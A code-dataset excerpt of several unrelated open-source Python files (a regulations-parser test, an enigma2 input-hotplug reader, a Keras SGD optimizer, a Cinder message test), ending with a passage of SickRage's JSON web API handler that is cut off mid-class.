Ref("abcabc", "ref5", 5)],
("101", "22", "b", "2", "iii"): [
Ref("abc", "ref6", 6),
Ref("zzz", "ref7", 7)]}
# Check that the return value is correct
layer_el = t.process(Node(
"This has abc, aabbcc, aaa, abcabc, and zzz",
label=["101", "22", "b", "2", "ii"]))
self.assertEqual(
[el['ref'] for el in layer_el],
['aaa:ref4', 'aabbcc:ref2', 'abc:ref1', 'abcabc:ref5'])
def test_process_label_in_node(self):
"""Make sure we don't highlight definitions that are being defined
in this paragraph."""
tree = Node(children=[
Node("Defining secret phrase.", label=['AB', 'a']),
Node("Has secret phrase. Then some other content",
label=['AB', 'b'])
], label=['AB'])
t = Terms(tree)
t.scoped_terms = {
('AB',): [Ref("secret phrase", "AB-a", 9)]
}
# Term is defined in the first child
self.assertEqual([], t.process(tree.children[0]))
self.assertEqual(1, len(t.process(tree.children[1])))
| cmc333333/regulations-parser | tests/layer_terms_tests.py | Python | cc0-1.0 | 20,193 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import Components.Netlink
import enigma
import os
class NetlinkReader():
def __init__(self):
from twisted.internet import reactor
self.nls = Components.Netlink.NetlinkSocket()
reactor.addReader(self)
def fileno(self):
return self.nls.fileno()
def doRead(self):
for event in self.nls.parse():
try:
subsystem = event['SUBSYSTEM']
if subsystem == 'input':
devname = event['DEVNAME']
action = event['ACTION']
if action == 'add':
print("New input device detected:", devname)
enigma.addInputDevice(os.path.join('/dev', devname))
elif action == 'remove':
print("Removed input device:", devname)
enigma.removeInputDevice(os.path.join('/dev', devname))
elif subsystem == 'net':
from Components.Network import iNetwork
iNetwork.hotplug(event)
except KeyError:
# Ignore "not found"
pass
def connectionLost(self, failure):
# Ignore...
print("connectionLost?", failure)
self.nls.close()
def logPrefix(self):
return 'NetlinkReader'
reader = NetlinkReader()
| atvcaptain/enigma2 | lib/python/Components/InputHotplug.py | Python | gpl-2.0 | 1,149 |
"""Kerasのoptimizer関連。"""
# pylint: disable=no-name-in-module,attribute-defined-outside-init,invalid-unary-operand-type
import tensorflow as tf
K = tf.keras.backend
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class SGDEx(tf.keras.optimizers.SGD):
"""重み別に学習率の係数を設定できるSGD。
lr_multipliersは、Layerまたは各weightのnameをキーとし、学習率の係数を値としたdict。
例::
lr_multipliers = {basenet: 0.1}
"""
def __init__(
self,
learning_rate,
lr_multipliers=None,
momentum=0.9,
decay=0.0,
nesterov=True,
lr=None, # deprecated
**kwargs,
):
assert lr is None
super().__init__(
learning_rate=learning_rate,
momentum=momentum,
decay=decay,
nesterov=nesterov,
**kwargs,
)
# {レイヤー: multiplier} or {重みの名前: multiplier}
# model.save()時に前者はそのまま保存できないので、後者に統一する。
self.lr_multipliers = {}
for layer_or_weights_name, mp in (lr_multipliers or {}).items():
if isinstance(layer_or_weights_name, str):
self.lr_multipliers[layer_or_weights_name] = mp
else:
for w in layer_or_weights_name.trainable_weights:
self.lr_multipliers[w.name] = mp
def _resource_apply_dense(self, grad, var, apply_state=None):
# pylint: disable=no-name-in-module,import-error
from tensorflow.python.training import training_ops
var_device, var_dtype = var.device, var.dtype.base_dtype
coefficients = (apply_state or {}).get(
(var_device, var_dtype)
) or self._fallback_apply_state(var_device, var_dtype)
if var.name in self.lr_multipliers:
lr_t = coefficients["lr_t"] * self.lr_multipliers[var.name]
else:
lr_t = coefficients["lr_t"]
if self._momentum:
momentum_var = self.get_slot(var, "momentum")
return training_ops.resource_apply_keras_momentum(
var.handle,
momentum_var.handle,
lr_t,
grad,
coefficients["momentum"],
use_locking=self._use_locking,
use_nesterov=self.nesterov,
)
else:
return training_ops.resource_apply_gradient_descent(
var.handle, lr_t, grad, use_locking=self._use_locking
)
def get_config(self):
config = {"lr_multipliers": self.lr_multipliers}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
| ak110/pytoolkit | pytoolkit/optimizers.py | Python | mit | 2,799 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from cinder.message import defined_messages
from cinder import test
CONF = cfg.CONF
class DefinedMessagesTest(test.TestCase):
def test_event_id_formats(self):
"""Assert all cinder event ids start with VOLUME_."""
for attr_name in dir(defined_messages.EventIds):
if not attr_name.startswith('_'):
value = getattr(defined_messages.EventIds, attr_name)
self.assertTrue(value.startswith('VOLUME_'))
def test_unique_event_ids(self):
"""Assert that no event_id is duplicated."""
event_ids = []
for attr_name in dir(defined_messages.EventIds):
if not attr_name.startswith('_'):
value = getattr(defined_messages.EventIds, attr_name)
event_ids.append(value)
self.assertEqual(len(event_ids), len(set(event_ids)))
def test_event_id_has_message(self):
for attr_name in dir(defined_messages.EventIds):
if not attr_name.startswith('_'):
value = getattr(defined_messages.EventIds, attr_name)
msg = defined_messages.event_id_message_map.get(value)
self.assertGreater(len(msg), 1)
| Datera/cinder | cinder/tests/unit/message/test_defined_messages.py | Python | apache-2.0 | 1,787 |
# Author: Dennis Lutter <lad1337@gmail.com>
# Author: Jonathon Saine <thezoggy@gmail.com>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import time
import urllib
import datetime
import re
import traceback
import sickbeard
from sickrage.helper.common import dateFormat, dateTimeFormat, timeFormat
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException
from sickrage.helper.quality import get_quality_string
from sickrage.media.ShowFanArt import ShowFanArt
from sickrage.media.ShowNetworkLogo import ShowNetworkLogo
from sickrage.media.ShowPoster import ShowPoster
from sickrage.media.ShowBanner import ShowBanner
from sickrage.show.ComingEpisodes import ComingEpisodes
from sickrage.show.History import History
from sickrage.show.Show import Show
from sickrage.system.Restart import Restart
from sickrage.system.Shutdown import Shutdown
from versionChecker import CheckVersion
from sickbeard import db, logger, ui, helpers
from sickbeard import search_queue
from sickbeard import image_cache
from sickbeard import classes
from sickbeard import processTV
from sickbeard import network_timezones, sbdatetime
from sickbeard.common import DOWNLOADED
from sickbeard.common import FAILED
from sickbeard.common import IGNORED
from sickbeard.common import Overview
from sickbeard.common import Quality
from sickbeard.common import SKIPPED
from sickbeard.common import SNATCHED
from sickbeard.common import SNATCHED_PROPER
from sickbeard.common import UNAIRED
from sickbeard.common import UNKNOWN
from sickbeard.common import WANTED
from sickbeard.common import ARCHIVED
from sickbeard.common import statusStrings
import codecs
try:
import json
except ImportError:
import simplejson as json
from tornado.web import RequestHandler
indexer_ids = ["indexerid", "tvdbid"]
RESULT_SUCCESS = 10 # only use inside the run methods
RESULT_FAILURE = 20 # only use inside the run methods
RESULT_TIMEOUT = 30 # not used yet :(
RESULT_ERROR = 40 # only use outside of the run methods !
RESULT_FATAL = 50 # only use in Api.default() ! this is the "we encountered an internal error" error
RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error
result_type_map = {
RESULT_SUCCESS: "success",
RESULT_FAILURE: "failure",
RESULT_TIMEOUT: "timeout",
RESULT_ERROR: "error",
RESULT_FATAL: "fatal",
RESULT_DENIED: "denied",
}
# basically everything except RESULT_SUCCESS / success is bad
class ApiHandler(RequestHandler):
""" api class that returns json results """
version = 5 # use an int since float-point is unpredictable
def __init__(self, *args, **kwargs):
super(ApiHandler, self).__init__(*args, **kwargs)
#def set_default_headers(self):
#self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
def get(self, *args, **kwargs):
kwargs = self.request.arguments
for arg, value in kwargs.iteritems():
if len(value) == 1:
kwargs[arg] = value[0]
args = args[1:]
# set the output callback
# default json
outputCallbackDict = {
'default': self._out_as_json,
'image': self._out_as_image,
}
accessMsg = u"API :: " + self.request.remote_ip + " - gave correct API KEY. ACCESS GRANTED"
logger.log(accessMsg, logger.DEBUG)
# set the original call_dispatcher as the local _call_dispatcher
_call_dispatcher = self.call_dispatcher
# if profile was set wrap "_call_dispatcher" in the profile function
if 'profile' in kwargs:
from profilehooks import profile
_call_dispatcher = profile(_call_dispatcher, immediate=True)
del kwargs["profile"]
try:
outDict = _call_dispatcher(args, kwargs)
except Exception, e: # real internal error oohhh nooo :(
logger.log(u"API :: " + ex(e), logger.ERROR)
errorData = {
"error_msg": ex(e),
"args": args,
"kwargs": kwargs
}
outDict = _responds(RESULT_FATAL, errorData,
"SickRage encountered an internal error! Please report to the Devs")
if 'outputType' in outDict:
outputCallback = outputCallbackDict[outDict['outputType']]
else:
outputCallback = outputCallbackDict['default']
try:self.finish(outputCallback(outDict))
except:pass
def _out_as_image(self, dict):
self.set_header('Content-Type', dict['image'].get_media_type())
return dict['image'].get_media()
def _out_as_json(self, dict):
self.set_header("Content-Type", "application/json;charset=UTF-8")
try:
out = json.dumps(dict, ensure_ascii=False, sort_keys=True)
callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None)
if callback is not None:
out = callback + '(' + out + ');' # wrap with JSONP call if requested
except Exception, e: # if we fail to generate the output fake an error
logger.log(u"API :: " + traceback.format_exc(), logger.DEBUG)
out = '{"result": "%s", "message": "error while composing output: %s"}' %\
(result_type_map[RESULT_ERROR], ex(e))
return out
def call_dispatcher(self, args, kwargs):
""" calls the appropriate CMD class
looks for a cmd in args and kwargs
or calls the TVDBShorthandWrapper when the first args element is a number
or returns an error that there is no such cmd
"""
logger.log(u"API :: all args: '" + str(args) + "'", logger.DEBUG)
logger.log(u"API :: all kwargs: '" + str(kwargs) + "'", logger.DEBUG)
cmds = None
if args:
cmds = args[0]
args = args[1:]
if "cmd" in kwargs:
cmds = kwargs["cmd"]
del kwargs["cmd"]
outDict = {}
if cmds is not None:
cmds = cmds.split("|")
multiCmds = bool(len(cmds) > 1)
for cmd in cmds:
curArgs, curKwargs = self.filter_params(cmd, args, kwargs)
cmdIndex = None
if len(cmd.split("_")) > 1: # was a index used for this cmd ?
cmd, cmdIndex = cmd.split("_") # this gives us the clear cmd and the index
logger.log(u"API :: " + cmd + ": curKwargs " + str(curKwargs), logger.DEBUG)
if not (multiCmds and cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter')): # skip these cmd while chaining
try:
if cmd in function_mapper:
# map function
func = function_mapper.get(cmd)
# add request handler to function
func.rh = self
# call function and get response back
curOutDict = func(curArgs, curKwargs).run()
elif _is_int(cmd):
curOutDict = TVDBShorthandWrapper(curArgs, curKwargs, cmd).run()
else:
curOutDict = _responds(RESULT_ERROR, "No such cmd: '" + cmd + "'")
except ApiError, e: # Api errors that we raised, they are harmless
curOutDict = _responds(RESULT_ERROR, msg=ex(e))
else: # if someone chained one of the forbiden cmds they will get an error for this one cmd
curOutDict = _responds(RESULT_ERROR, msg="The cmd '" + cmd + "' is not supported while chaining")
if multiCmds:
# note: if multiple same cmds are issued but one has not an index defined it will override all others
# or the other way around, this depends on the order of the cmds
# this is not a bug
if cmdIndex is None: # do we need a index dict for this cmd ?
outDict[cmd] = curOutDict
else:
if not cmd in outDict:
outDict[cmd] = {}
outDict[cmd][cmdIndex] = curOutDict
else:
outDict = curOutDict
if multiCmds: # if we had multiple cmds we have to wrap it in a response dict
outDict = _responds(RESULT_SUCCESS, outDict)
else: # index / no cmd given
outDict = CMD_SickBeard(args, kwargs).run()
return outDict
def filter_params(self, cmd, args, kwargs):
""" return only params kwargs that are for cmd
and rename them to a clean version (remove "<cmd>_")
args are shared across all cmds
all args and kwarks are lowerd
cmd are separated by "|" e.g. &cmd=shows|future
kwargs are namespaced with "." e.g. show.indexerid=101501
if a karg has no namespace asing it anyways (global)
full e.g.
/api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc
two calls of show.seasonlist
one has the index "asd" the other one "2"
the "indexerid" kwargs / params have the indexed cmd as a namspace
and the kwarg / param "sort" is a used as a global
"""
curArgs = []
for arg in args:
curArgs.append(arg.lower())
curArgs = tuple(curArgs)
curKwargs = {}
for kwarg in kwargs:
if kwarg.find(cmd + ".") == 0:
cleanKey = kwarg.rpartition(".")[2]
curKwargs[cleanKey] = kwargs[kwarg].lower()
elif not "." in kwarg: # the kwarg was not namespaced therefore a "global"
curKwargs[kwarg] = kwargs[kwarg]
return curArgs, curKwargs
class ApiCall(ApiHandler):
_help = {"desc": "This command is not documented. Please report this to the developers."}
def __init__(self, args, kwargs):
# missing
try:
if self._missing:
self.run = self.return_missing
except AttributeError:
pass
# help
if 'help' in kwargs:
self.run = self.return_help
def run(self):
# override with real output function in subclass
return {}
def return_help(self):
try:
if self._requiredParams:
pass
except AttributeError:
self._requiredParams = []
try:
if self._optionalParams:
pass
except AttributeError:
self._optionalParams = []
for paramDict, type in [(self._requiredParams, "requiredParameters"),
(self._optionalParams, "optionalParameters")]:
if type in self._help:
for paramName in paramDict:
if not paramName in self._help[type]:
self._help[type][paramName] = {}
if paramDict[paramName]["allowedValues"]:
self._help[type][paramName]["allowedValues"] = paramDict[paramName]["allowedValues"]
else:
self._help[type][paramName]["allowedValues"] = "see desc"
self._help[type][paramName]["defaultValue"] = paramDict[paramName]["defaultValue"]
self._help[type][paramName]["type"] = paramDict[paramName]["type"]
elif paramDict:
for paramName in paramDict:
self._help[type] = {}
self._help[type][paramName] = paramDict[paramName]
else:
self._help[type] = {}
msg = "No description available"
if "desc" in self._help:
msg = self._help["desc"]
return _responds(RESULT_SUCCESS, self._help, msg)
def return_missing(self):
if len(self._missing) == 1:
msg = "The required parameter: '" + self._missing[0] + "' was not set"
else:
msg = "The required parameters: '" + "','".join(self._missing) + "' where not set"
return _responds(RESULT_ERROR, msg=msg)
def check_params(self, args, kwargs, key, default, required, type, allowedValues):
# TODO: explain this
""" function to check passed params for the shorthand wrapper
and to detect missing/required param
"""
# auto-select indexer
if key in indexer_ids:
if "tvdbid" in kwargs:
key = "tvdbid"
self.indexer = indexer_ids.index(key)
missing = True
orgDefault = default
if type == "bool":
allowedValues = [0, 1]
if args:
default = args[0]
missing = False
args = args[1:]
if kwargs.get(key):
default = kwargs.get(key)
missing = False
if required:
try:
self._missing
self._requiredParams.append(key)
except AttributeError:
self._missing = []
self._requiredParams = {key: {"allowedValues": allowedValues,
"defaultValue": orgDefault,
"type": type}}
if missing and key not in self._missing:
self._missing.append(key)
else:
try:
self._optionalParams[key] = {"allowedValues": allowedValues,
"defaultValue": orgDefault,
"type": type}
except AttributeError:
self._optionalParams = {}
self._optionalParams[key] = {"allowedValues": allowedValues,
"defaultValue": orgDefault,
"type": type}
if default:
default = self._check_param_type(default, key, type)
if type == "bool":
type = []
self._check_param_value(default, key, allowedValues)
return default, args
def _check_param_type(self, value, name, type):
""" checks if value can be converted / parsed to type
will raise an error on failure
or will convert it to type and return new converted value
can check for:
- int: will be converted into int
- bool: will be converted to False / True
- list: will always return a list
- string: will do nothing for now
- ignore: will ignore it, just like "string"
"""
error = False
if type == "int":
if _is_int(value):
value = int(value)
else:
error = True
elif type == "bool":
if value in ("0", "1"):
value = bool(int(value))
elif value in ("true", "True", "TRUE"):
value = True
elif value in ("false", "False", "FALSE"):
value = False
elif value not in (True, False):
error = True
elif type == "list":
value = value.split("|")
elif type == "string":
pass
elif type == "ignore":
pass
else:
logger.log(u'API :: Invalid param type: "%s" can not be checked. Ignoring it.' % str(type), logger.ERROR)
if error:
# this is a real ApiError !!
raise ApiError(u'param "%s" with given value "%s" could not be parsed into "%s"'
% (str(name), str(value), str(type)))
return value
def _check_param_value(self, value, name, allowedValues):
""" will check if value (or all values in it ) are in allowed values
will raise an exception if value is "out of range"
if bool(allowedValue) == False a check is not performed and all values are excepted
"""
if allowedValues:
error = False
if isinstance(value, list):
for item in value:
if not item in allowedValues:
error = True
else:
if not value in allowedValues:
error = True
if error:
# this is kinda a ApiError but raising an error is the only way of quitting here
raise ApiError(u"param: '" + str(name) + "' with given value: '" + str(
value) + "' is out of allowed range '" + str(allowedValues) + "'")
class TVDBShorthandWrapper(ApiCall):
_help = {"desc": "This is an internal function wrapper. Call the help command directly for more information."}
def __init__(self, args, kwargs, sid):
self.origArgs = args
self.kwargs = kwargs
self.sid = sid
self.s, args = self.check_params(args, kwargs, "s", None, False, "ignore", [])
self.e, args = self.check_params(args, kwargs, "e", None, False, "ignore", [])
self.args = args
ApiCall.__init__(self, args, kwargs)
def run(self):
""" internal function wrapper """
args = (self.sid,) + self.origArgs
if self.e:
return CMD_Episode(args, self.kwargs).run()
elif self.s:
return CMD_ShowSeasons(args, self.kwargs).run()
else:
return CMD_Show(args, self.kwargs).run()
# ###############################
# helper functions #
# ###############################
def _sizeof_fmt(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.00:
return "%3.2f %s" % (num, x)
num /= 1024.00
def _is_int(data):
try:
int(data)
except (TypeError, ValueError, OverflowError):
return False
else:
return True
def _rename_element(dict, oldKey, newKey):
try:
dict[newKey] = dict[oldKey]
del dict[oldKey]
except (ValueError, TypeError, NameError):
pass
return dict
def _responds(result_type, data=None, msg=""):
"""
result is a string of given "type" (success/failure/timeout/error)
message is a human readable string, can be empty
data is either a dict or a array, can be a empty dict or empty array
"""
if data is None:
data = {}
return {"result": result_type_map[result_type],
"message": msg,
"data": data}
def _get_status_Strings(s):
return statusStrings[s]
def _ordinal_to_dateTimeForm(ordinal):
# workaround for episodes with no airdate
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateTimeFormat)
def _ordinal_to_dateForm(ordinal):
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateFormat)
def _historyDate_to_dateTimeForm(timeString):
date = datetime.datetime.strptime(timeString, History.date_format)
return date.strftime(dateTimeFormat)
def _mapQuality(showObj):
quality_map = _getQualityMap()
anyQualities = []
bestQualities = []
iqualityID, aqualityID = Quality.splitQuality(int(showObj))
if iqualityID:
for quality in iqualityID:
anyQualities.append(quality_map[quality])
if aqualityID:
for quality in aqualityID:
bestQualities.append(quality_map[quality])
return anyQualities, bestQualities
def _getQualityMap():
return {Quality.SDTV: 'sdtv',
Quality.SDDVD: 'sddvd',
Quality.HDTV: 'hdtv',
Quality.RAWHDTV: 'rawhdtv',
Quality.FULLHDTV: 'fullhdtv',
Quality.HDWEBDL: 'hdwebdl',
Quality.FULLHDWEBDL: 'fullhdwebdl',
Quality.HDBLURAY: 'hdbluray',
Quality.FULLHDBLURAY: 'fullhdbluray',
Quality.UNKNOWN: 'unknown'}
def _getRootDirs():
if sickbeard.ROOT_DIRS == "":
return {}
rootDir = {}
root_dirs = sickbeard.ROOT_DIRS.split('|')
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
rootDir["default_index"] = int(sickbeard.ROOT_DIRS.split('|')[0])
# remove default_index value from list (this fixes the offset)
root_dirs.pop(0)
if len(root_dirs) < default_index:
return {}
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
default_dir = root_dirs[default_index]
dir_list = []
for root_dir in root_dirs:
valid = 1
try:
ek(os.listdir, root_dir)
except:
valid = 0
default = 0
if root_dir is default_dir:
default = 1
curDir = {}
curDir['valid'] = valid
curDir['location'] = root_dir
curDir['default'] = default
dir_list.append(curDir)
return dir_list
class ApiError(Exception):
"""
Generic API error
"""
class IntParseError(Exception):
"""
A value could not be parsed into an int, but should be parsable to an int
"""
# -------------------------------------------------------------------------------------#
class CMD_Help(ApiCall):
_help = {
"desc": "Get help about a given command",
"optionalParameters": {
"subject": {"desc": "The name of the command to get the help of"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.subject, args = self.check_params(args, kwargs, "subject", "help", False, "string", function_mapper.keys())
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get help about a given command """
if self.subject in function_mapper:
out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {"help": 1}).run())
else:
out = _responds(RESULT_FAILURE, msg="No such cmd")
return out
class CMD_ComingEpisodes(ApiCall):
_help = {
"desc": "Get the coming episodes",
"optionalParameters": {
"sort": {"desc": "Change the sort order"},
"type": {"desc": "One or more categories of coming episodes, separated by |"},
"paused": {
"desc": "0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "date", False, "string", ComingEpisodes.sorts.keys())
self.type, args = self.check_params(args, kwargs, "type", '|'.join(ComingEpisodes.categories), False, "list",
ComingEpisodes.categories)
self.paused, args = self.check_params(args, kwargs, "paused", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,
"bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the coming episodes """
grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)
data = {section: [] for section in grouped_coming_episodes.keys()}
for section, coming_episodes in grouped_coming_episodes.iteritems():
for coming_episode in coming_episodes:
data[section].append({
'airdate': coming_episode['airdate'],
'airs': coming_episode['airs'],
'ep_name': coming_episode['name'],
'ep_plot': coming_episode['description'],
'episode': coming_episode['episode'],
'indexerid': coming_episode['indexer_id'],
'network': coming_episode['network'],
'paused': coming_episode['paused'],
'quality': coming_episode['quality'],
'season': coming_episode['season'],
'show_name': coming_episode['show_name'],
'show_status': coming_episode['status'],
'tvdbid': coming_episode['tvdbid'],
'weekday': coming_episode['weekday']
})
return _responds(RESULT_SUCCESS, data)
class CMD_Episode(ApiCall):
_help = {
"desc": "Get detailed information about an episode",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"full_path": {
"desc": "Return the full absolute show location (if valid, and True), or the relative show location"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
self.fullPath, args = self.check_params(args, kwargs, "full_path", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about an episode """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
myDB = db.DBConnection(row_type="dict")
sqlResults = myDB.select(
"SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?",
[self.indexerid, self.e, self.s])
if not len(sqlResults) == 1:
raise ApiError("Episode not found")
episode = sqlResults[0]
# handle path options
# absolute vs relative vs broken
showPath = None
try:
showPath = showObj.location
except ShowDirectoryNotFoundException:
pass
if bool(self.fullPath) == True and showPath:
pass
elif bool(self.fullPath) == False and showPath:
# using the length because lstrip removes to much
showPathLength = len(showPath) + 1 # the / or \ yeah not that nice i know
episode["location"] = episode["location"][showPathLength:]
elif not showPath: # show dir is broken ... episode path will be empty
episode["location"] = ""
# convert stuff to human form
episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(int(episode['airdate']), showObj.airs, showObj.network)),
d_preset=dateFormat)
status, quality = Quality.splitCompositeStatus(int(episode["status"]))
episode["status"] = _get_status_Strings(status)
episode["quality"] = get_quality_string(quality)
episode["file_size_human"] = _sizeof_fmt(episode["file_size"])
return _responds(RESULT_SUCCESS, episode)
class CMD_EpisodeSearch(ApiCall):
_help = {
"desc": "Search for an episode. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
epObj = showObj.getEpisode(int(self.s), int(self.e))
if isinstance(epObj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# make a queue item for it and put it on the queue
ep_queue_item = search_queue.ManualSearchQueueItem(showObj, epObj)
sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable
# wait until the queue item tells us whether it worked or not
while ep_queue_item.success == None: # @UndefinedVariable
time.sleep(1)
# return the correct json value
if ep_queue_item.success:
status, quality = Quality.splitCompositeStatus(epObj.status) # @UnusedVariable
# TODO: split quality and status?
return _responds(RESULT_SUCCESS, {"quality": get_quality_string(quality)},
"Snatched (" + get_quality_string(quality) + ")")
return _responds(RESULT_FAILURE, msg='Unable to find episode')
class CMD_EpisodeSetStatus(ApiCall):
_help = {
"desc": "Set the status of an episode or a season (when no episode is provided)",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"status": {"desc": "The status of the episode or season"}
},
"optionalParameters": {
"episode": {"desc": "The episode number"},
"force": {"desc": "True to replace existing downloaded episode or season, False otherwise"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.status, args = self.check_params(args, kwargs, "status", None, True, "string",
["wanted", "skipped", "ignored", "failed"])
# optional
self.e, args = self.check_params(args, kwargs, "episode", None, False, "int", [])
self.force, args = self.check_params(args, kwargs, "force", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the status of an episode or a season (when no episode is provided) """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
# convert the string status to a int
for status in statusStrings.statusStrings:
if str(statusStrings[status]).lower() == str(self.status).lower():
self.status = status
break
else: # if we dont break out of the for loop we got here.
# the allowed values has at least one item that could not be matched against the internal status strings
raise ApiError("The status string could not be matched to a status. Report to Devs!")
ep_list = []
if self.e:
epObj = showObj.getEpisode(self.s, self.e)
if epObj == None:
return _responds(RESULT_FAILURE, msg="Episode not found")
ep_list = [epObj]
else:
# get all episode numbers frome self,season
ep_list = showObj.getAllEpisodes(season=self.s)
def _epResult(result_code, ep, msg=""):
return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_Strings(ep.status),
'result': result_type_map[result_code], 'message': msg}
ep_results = []
failure = False
start_backlog = False
segments = {}
sql_l = []
for epObj in ep_list:
with epObj.lock:
if self.status == WANTED:
# figure out what episodes are wanted so we can backlog them
if epObj.season in segments:
segments[epObj.season].append(epObj)
else:
segments[epObj.season] = [epObj]
# don't let them mess up UNAIRED episodes
if epObj.status == UNAIRED:
if self.e != None: # setting the status of a unaired is only considert a failure if we directly wanted this episode, but is ignored on a season request
ep_results.append(
_epResult(RESULT_FAILURE, epObj, "Refusing to change status because it is UNAIRED"))
failure = True
continue
if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:
ep_results.append(_epResult(RESULT_FAILURE, epObj, "Refusing to change status to FAILED because failed download handling is disabled"))
failure = True
continue
# allow the user to force setting the status for an already downloaded episode
if epObj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:
ep_results.append(_epResult(RESULT_FAILURE, epObj, "Refusing to change status because it is already marked as DOWNLOADED"))
failure = True
continue
epObj.status = self.status
sql_l.append(epObj.get_sql())
if self.status == WANTED:
start_backlog = True
ep_results.append(_epResult(RESULT_SUCCESS, epObj))
if len(sql_l) > 0:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
extra_msg = ""
if start_backlog:
for season, segment in segments.iteritems():
cur_backlog_queue_item = search_queue.BacklogQueueItem(showObj, segment)
sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable
logger.log(u"API :: Starting backlog for " + showObj.name + " season " + str(
season) + " because some episodes were set to WANTED")
extra_msg = " Backlog started"
if failure:
return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg)
else:
return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg)
class CMD_SubtitleSearch(ApiCall):
_help = {
"desc": "Search for an episode subtitles. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
